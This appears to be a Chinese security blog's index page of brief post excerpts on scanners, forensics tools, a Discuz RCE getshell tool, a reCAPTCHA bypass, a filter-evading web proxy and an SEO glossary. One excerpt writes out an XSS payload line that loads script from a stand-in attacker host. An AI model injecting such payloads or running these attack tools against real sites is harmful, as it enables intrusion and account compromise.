不再关注网络安全
PEpper PE文件分析 一个开源的PE文件恶意分析脚本,用于对PE执行恶意软件静态分析。PE(Portable Executable)格式,是微软环境可移植可执行文件(如exe、dll、vxd、sys和vdm等)的标准文件格式。 PEpper 安装 eva@paradise:~$ git clone https://github.com/Th3Hurrican3/PEpper/ eva@paradise:~$...
在很多反向代理场景,或是爬虫中我们都会使用脚本程序提取搜索结果而不是使用谷歌镜像。但谷歌搜索(google)的反爬虫及异常流量标准会给我们带来很多麻烦,一旦出现验证码reCAPTCHA,就基本中断了数据。今天体验盒子介绍一个方法可以绕开谷歌搜索永远不出现验证码的方案。 绕开谷歌搜索验证码reCAPTCHA Facebook 有一个调试工具。有...
miniProxy web代理 miniProxy是一个用PHP编写的简单Web代理,可以让您绕过Internet内容过滤器(如谷歌镜像),或匿名浏览Internet。miniProxy是根据GNU GPL v3许可的。miniProxy的前身是pageForward。 miniProxy安装和使用 只需下载miniProxy.php到您的Web服务器(建议重命名)并直接访问它。 miniProxy是单文件并且没有必...
XSpear XSS扫描器 XSpear是一款基于RubyGems的的XSS漏洞扫描器。拥有常见的XSS漏洞扫描攻击测试功能。还可进行参数分析。 XSS漏洞扫描器 主要特点 基于模式匹配的XSS扫描检测alert confirm prompt无头浏览器上的事件(使用Selenium)测试XSS保护旁路和反射参数的请求/响应反射的参数过滤测试 event handler HTML tag Special Ch...
xss_payloads xss_payloads是一个基于PHP的跨站脚本XSS Payloads生成器。 用法 在您的应用中找到XSS vuln获取PoC漏洞:alert(1) 等等在某处托管这些payloads使用vuln将其中一个payloads拉入应用程序 <script src="http://attackerip/file.js"></script>利用 js vs php文件 一些文件是纯JavaScript.js文...
OSXCollector取证工具 OSXCollector是macOS/OSX的取证证据收集和分析工具包,集合脚本在可能受感染的计算机上运行,并输出描述目标计算机的JSON文件。OSXCollector从plist,SQLite数据库和本地文件系统信息收集。 macOS/OSX取证证据收集和分析工具包 分析 有了OSXCollector,安全分析师可以确定如下问题: 这台机器被感染...
BurpSuite AuthMatrix插件 AuthMatrix 是一个Burp Suite扩展,用于检测权限授权问题,设置好session就能进行自动化测试。相似功能的插件还有:BurpSuite Authz。Authz会先访问一遍接口抓包,然后“Send request(s) to Authz”,设置低权限的cookie,“Run”就会使用低权限的cookie去请求,结果会匹配给出相似度百分比,可以查看每个请求的详...
Discuz ML RCE漏洞检测工具 Discuz国际版漏洞存在于cookie的language可控并且没有严格过滤,导致可以远程代码执行。本工具支持单url和批量检测,有判断模式(只判断有无该漏洞)、cmdshell模式(返回简单的cmd shell)和getshell模式(写入一句话木马)。 Discuz ML POC EXP 下载 python2.7 gi...
SEO/SEM人员常说的IP、UIP、UV、PV、VV、CPC、CPM、RPM、CTR是什么意思?看下面: IP(Internet Protocol)独立IP数 指1天内使用不同IP地址的用户访问网站的数量,同一IP无论访问了几个页面,独立IP数均为1。 UIP(Unique IP)独立IP 和UV类似,正常情况下,同一个IP可能会有很多个UV,同一个UV只能有一个IP,跟上面的IP一...
XSSCon介绍 XSSCon是一个用于扫描和利用XSS漏洞的工具,基于python 3.7编写。 XSSCon XSS扫描工具界面 主要特点 抓取网站上的所有链接(爬虫引擎)支持POST和GET表单许多可以自定义的设置高级错误处理多任务支持支持代理支持cookie等等.... XSSCon安装 apt-get install python3 git clone ...